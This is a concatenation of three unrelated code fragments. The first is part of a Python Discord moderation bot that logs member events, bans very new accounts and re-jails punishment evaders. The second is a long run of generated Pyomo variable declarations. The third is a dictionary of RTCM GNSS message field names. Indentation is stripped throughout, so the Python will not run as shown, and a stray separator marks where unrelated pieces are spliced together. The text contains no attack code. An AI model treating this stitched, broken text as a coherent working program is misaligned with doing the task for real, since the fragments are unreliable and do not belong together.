# testout = [before.roles[x] for x in before.roles]
# embed=discord.Embed(description=before.mention + " **nickname changed**", color=0x117ea6)
# embed.add_field(name=before.mention + " **was given the" , value=before.nick, inline=False)
# pfp = get_avatar(before)
# embed.set_author(name=before, icon_url=pfp)
# embed.set_footer(text="ID: " + before.id + " • Today at " + f"{datetime.now():%I:%M %p}")
# await bot.send_message(discord.Object(id=adminLogs),embed=embed)
# await log_backup_embed(embed)
print('roles changed')
elif len(after.roles) > len(before.roles):
print('less')
print('roles changed')
else:
pass
else:
return
@bot.event
async def on_member_join(member):
no = discord.Object(id=ignoreServ)
if int(member.server.id) == int(no.id):
return
sendWelcome = True
Snow2 = discord.utils.get(member.server.roles, id = joinRole)
# Member join log
embed=discord.Embed(description=member.mention + " " + member.name, color=0x23d160)
embed.add_field(name="Account Creation Date", value=member.created_at, inline=False)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Joined", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
# kicks new accounts to prevent raid
if datetime.utcnow() - timedelta(hours=newAccount) < member.created_at:
channel = discord.utils.get(member.server.channels, id = adminChan)
await bot.send_message(member, 'Your account is too new for "Coffee & Politics". If you wish to join our discussions please wait a few days and try again. :D')
await bot.send_message(channel, '@here\nI kicked ' + member.mention + ' because account was made in the last ' + str(newAccount) + ' hours.')
await bot.ban(member,0)
sendWelcome = False
# Checks for punishment evasion
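# Punishment state is tracked with marker files under logs/db/: "<user id>.punish"
# marks a user who left while punished and "<user id>.kicked" marks a plain kick;
# a returning member with a .punish file but no .kicked file is re-jailed below.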
try:
filePath = curDir + '/logs/db/' + str(member.id)
# Looks for punish file
t = open(filePath + '.punish')
t.close()
jail = discord.utils.get(member.server.roles, id = jailRole)
Snow1 = discord.utils.get(member.server.roles, id = talkRole)
Snow2 = discord.utils.get(member.server.roles, id = joinRole)
try:
k = open(filePath + '.kicked')
k.close()
sendWelcome = True
except:
embed=discord.Embed(title="User Jailed!", description="**{0}** was jailed for punishment evasion!".format(member), color=0xd30000)
await bot.send_message(discord.Object(id=logAct),embed=embed)
sendWelcome = False
# await bot.say(embed=embed)
await bot.add_roles(member, jail)
await asyncio.sleep(1)
await bot.remove_roles(member, Snow1)
await asyncio.sleep(1)
await bot.remove_roles(member, Snow2)
except:
pass
with open(curDir + '/include/special') as txt:
specialPeople = [line.strip('\n').split(',') for line in txt]
with open(curDir + '/include/whitelist') as txt:
whitelist = [line.strip('\n').split(',') for line in txt]
if [str(member.id)] in specialPeople and not [str(member.id)] in whitelist:
channel = discord.utils.get(member.server.channels, id = adminChan)
await bot.send_message(channel, '@here\nI banned ' + member.mention + ' for stuff and things and reasons.')
await bot.ban(member,0)
sendWelcome = False
# Looks for time file
try:
t = open(curDir + '/logs/db/' + mainServ + '.time')
t.close()
if sendWelcome:
await bot.add_roles(member, Snow2)
channel = discord.utils.get(member.server.channels, id = welcomeChan)
await bot.send_message(channel, 'Hey ' + member.mention + ', welcome to **Coffee & Politics** \U0001F389\U0001F917 !')
channel = discord.utils.get(member.server.channels, id = botChan)
msg = await bot.send_message(channel, 'Welcome ' + member.mention + '! To access <#' + genChan + '> and other channels you need a political role.\n(If you are learning select the learning role)\nIf you agree with <#' + ruleChan + '> give yourself an ideology role!\nExample:```.iam conservative\n.iamnot conservative```\nTo see available roles type `.LSAR`\n\nWe understand these may be painful instructions for a few people to follow.\nThose people include but not limited to:\nTrolls\nChildren\nPeople who can\'t read\nPeople who want to learn but can\'t read\n\nNot every community is for you.')
await asyncio.sleep(600)
await bot.delete_message(msg)
except:
if sendWelcome:
channel = discord.utils.get(member.server.channels, id = adminChan)
if is_in_trouble(member):
await bot.send_message(member, '**"Coffee & Politics"** has banned you for being unable to read. Sorry, go play roblox elsewhere.')
await bot.send_message(channel, '@here\n' + member.mention + ' can\'t read so I banned them.')
await bot.ban(member)
elif is_kicked(member):
await bot.send_message(member, '**"Coffee & Politics"** is currently not accepting members at this time. If you wish to join our discussions please wait a few days and try again.\nhttps://discord.gg/xVtZbn8')
await bot.send_message(channel, '@here\n' + member.mention + ' tried to join but I kicked them because server is closed. To open server, please `!disboard bump`.')
else:
await bot.send_message(member, '**"Coffee & Politics"** is currently not accepting members at this time. If you wish to join our discussions please wait a few days and try again.\nhttps://discord.gg/xVtZbn8')
await bot.send_message(channel, '@here\n' + member.mention + ' tried to join but I kicked them because server is closed. To open server, please `!disboard bump`.')
await bot.kick(member)
@bot.event
async def on_member_remove(member):
no = discord.Object(id=ignoreServ)
if int(member.server.id) == int(no.id):
return
# Member leave log
embed=discord.Embed(description=member.mention + " " + member.name, color=0xff470f)
embed.add_field(name="Join Date", value=member.joined_at, inline=False)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Left", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
# channel = discord.utils.get(member.server.channels, id = adminLogs)
# await bot.send_message(channel, 'Awww, ' + member.mention + ' just left the server \U0001F641')
@bot.event
async def on_member_ban(member):
no = discord.Object(id=ignoreServ)
if int(member.server.id) == int(no.id):
return
# Member ban log
embed=discord.Embed(description=member.mention + " " + member.name, color=0xff470f)
embed.add_field(name="Join Date", value=member.joined_at, inline=False)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Banned", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
@bot.event
async def on_member_unban(server, member):
no = discord.Object(id=ignoreServ)
# Unbanned users carry no server attribute, so compare against the server argument
if int(server.id) == int(no.id):
return
# Member ban log
embed=discord.Embed(description=member.mention + " " + member.name, color=0x117ea6)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Unbanned", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
@bot.event
async def on_message_edit(before, after):
no = discord.Object(id=ignoreServ)
if int(after.server.id) == int(no.id):
return
if is_bot(before):
return
#TODO: Isolate hit on embed update/refresh
if str(before.clean_content) == str(after.clean_content) and len(after.embeds) > 0:
return
# Member before text
embed=discord.Embed(description="**Message edited in " + before.channel.mention + "**", color=0x117ea6)
embed.add_field(name="Before", value=before.clean_content, inline=False)
pfp | |
initialize=0)
m.x302 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x303 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x304 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x305 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x306 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x307 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x308 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x309 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x310 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x311 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x312 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x313 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x314 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x315 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x316 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x317 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x318 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x319 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x320 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x321 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x322 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x323 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x324 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x325 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x326 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x327 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x328 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x329 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x330 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x331 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x332 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x333 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x334 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x335 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x336 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x337 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x338 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x339 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x340 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x341 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x342 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x343 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x344 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x345 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x346 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x347 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x348 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x349 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x350 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x351 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x352 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x353 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x354 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x355 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x356 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x357 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x358 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x359 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x360 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x361 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x362 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x363 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x364 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x365 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x366 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x367 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x368 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x369 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x370 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x371 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x372 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x373 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x374 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x375 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x376 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x377 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x378 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x379 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x380 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x381 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x382 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x383 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x384 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x385 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x386 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x387 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x388 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x389 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x390 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x391 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x392 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x393 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x394 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x395 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x396 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x397 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x398 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x399 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x400 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x401 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x402 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x403 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x404 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x405 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x406 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x407 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x408 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x409 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x410 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x411 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x412 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x413 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x414 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x415 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x416 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x417 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x418 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x419 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x420 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x421 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x422 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x423 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x424 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x425 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x426 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x427 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x428 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x429 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x430 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x431 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x432 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x433 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x434 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x435 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x436 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x437 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x438 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x439 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x440 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x441 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x442 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x443 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x444 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x445 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x446 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x447 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x448 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x449 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x450 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x451 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x452 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x453 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x454 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x455 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x456 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x457 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x458 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x459 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x460 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x461 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x462 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x463 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x464 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x465 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x466 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x467 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x468 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x469 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x470 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x471 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x472 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x473 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x474 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x475 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x476 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x477 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x478 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x479 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x480 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x481 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x482 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x483 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x484 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x485 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x486 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x487 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x488 = Var(within=Reals, bounds=(None,None), initialize=0)
m.b489 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b490 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b491 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b492 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b493 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b494 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b495 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b496 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b497 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b498 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b499 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b500 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b501 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b502 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b503 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b504 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b505 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b506 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b507 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b508 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b509 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b510 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b511 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b512 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b513 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b514 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b515 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b516 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b517 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b518 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b519 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b520 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b521 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b522 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b523 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b524 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b525 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b526 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b527 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b528 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b529 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b530 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b531 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b532 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b533 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b534 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b535 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b536 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b537 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b538 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b539 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b540 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b541 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b542 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b543 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b544 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b545 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b546 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b547 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b548 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b549 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b550 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b551 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b552 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b553 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b554 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b555 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b556 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b557 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b558 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b559 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b560 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b561 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b562 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b563 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b564 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b565 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b566 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b567 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b568 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b569 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b570 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b571 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b572 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b573 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b574 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b575 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b576 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b577 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b578 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b579 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b580 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b581 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b582 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b583 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b584 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b585 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b586 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b587 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b588 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b589 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b590 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b591 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b592 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b593 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b594 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b595 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b596 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b597 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b598 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b599 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b600 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b601 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b602 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b603 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b604 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b605 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b606 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b607 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b608 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b609 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b610 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b611 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b612 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b613 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b614 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b615 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b616 = Var(within=Binary, bounds=(0,1), initialize=0)
m.x617 = Var(within=Reals, bounds=(0,40), initialize=0)
m.x618 = Var(within=Reals, bounds=(0,40), initialize=0)
m.x619 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x620 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x621 = Var(within=Reals, bounds=(0,None), initialize=0)
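# ---------------------------------------------------------------------------
# A minimal sketch (not part of the generated model above) showing how runs of
# identically-typed variables can be declared with indexed Pyomo Vars instead of
# one statement per variable; the index ranges are read off the block above and
# the model name `sketch` is illustrative only.
from pyomo.environ import ConcreteModel, Var, Reals, Binary

sketch = ConcreteModel()
# x302..x468: continuous, non-negative, initialised to 0
sketch.x_nonneg = Var(range(302, 469), within=Reals, bounds=(0, None), initialize=0)
# x469..x488: continuous, unbounded
sketch.x_free = Var(range(469, 489), within=Reals, initialize=0)
# b489..b616: binary
sketch.b = Var(range(489, 617), within=Binary, initialize=0)
# Bounded variables such as x617/x618 would simply pass bounds=(0, 40) instead.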
Flag",
"DF183": "LaPC - Latitude of Projection Center",
"DF184": "LoPC - Longitude of Projection Center",
"DF185": "AzIL - Azimuth of Initial Line",
"DF186": "Diff ARSG - Difference, Angle from Rectified to Skew Grid",
"DF187": "Add SIL - Scale factor on Initial Line",
"DF188": "EPC - Easting at Projection Center",
"DF189": "NPC - Northing at Projection Center",
},
# "1028": {RESERVED for Global Plate-Fixed XFormation},
"1029": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF051": "Modified Julian Day (MJD) Number",
"DF052": "Seconds of Day (UTC)",
"DF138": "Number of Characters to Follow",
"DF139": "Number of UTF-8 Code Units (N)",
"group": (
"DF139",
{
"DF140": "UTF-8 Character Code Units",
},
),
},
"1030": {
"DF002": "Message Number",
"DF224": "GPS Residuals Epoch Time (TOW)",
"DF003": "Reference Station ID",
"DF223": "N-Refs",
"DF006": "GPS Number of Satellite Signals Processed",
"group": (
"DF006",
{
"DF009": "GPS Satellite ID",
"DF218": "soc",
"DF219": "sod",
"DF220": "soh",
"DF221": "sIc",
"DF222": "sId",
},
),
},
"1031": {
"DF002": "Message Number",
"DF225": "GLONASS Residuals Epoch Time (tk)",
"DF003": "Reference Station ID",
"DF223": "N-Refs",
"DF035": "GLONASS Number of Satellite Signals Processed",
"group": (
"DF035",
{
"DF038": "GLONASS Satellite ID",
"DF218": "soc",
"DF219": "sod",
"DF220": "soh",
"DF221": "sIc",
"DF222": "sId",
},
),
},
"1032": {
"DF002": "Message Number",
"DF003": "Non-Physical Reference Station ID",
"DF226": "Physical Reference Station ID",
"DF021": "ITRF Epoch Year",
"DF025": "Physical reference station ARP ECEF-X",
"DF026": "Physical reference station ARP ECEF-Y",
"DF027": "Physical reference station ARP ECEF-Z",
},
"1033": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF029": "Antenna Descriptor Counter N",
"group1": (
"DF029",
{
"DF030": "Antenna Descriptor",
"DF031": "Antenna Setup ID",
},
),
"DF032": "Antenna Serial Number Counter M",
"group2": (
"DF032",
{
"DF033": "Antenna Serial Number",
},
),
"DF227": "Receiver Type Descriptor Counter I",
"group3": (
"DF227",
{
"DF228": "Receiver Type Descriptor",
},
),
"DF229": "Receiver Firmware Version Counter J",
"group4": (
"DF229",
{
"DF230": "Receiver Firmware Version",
},
),
"DF231": "Receiver Serial Number Counter K",
"group5": (
"DF231",
{
"DF232": "Receiver Serial Number",
},
),
},
"1034": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF240": "GPS FKP Epoch Time (TOW)",
"DF006": "No. of GPS Satellite Signals Processed",
"group": (
"DF006",
{
"DF009": "GPS Satellite ID",
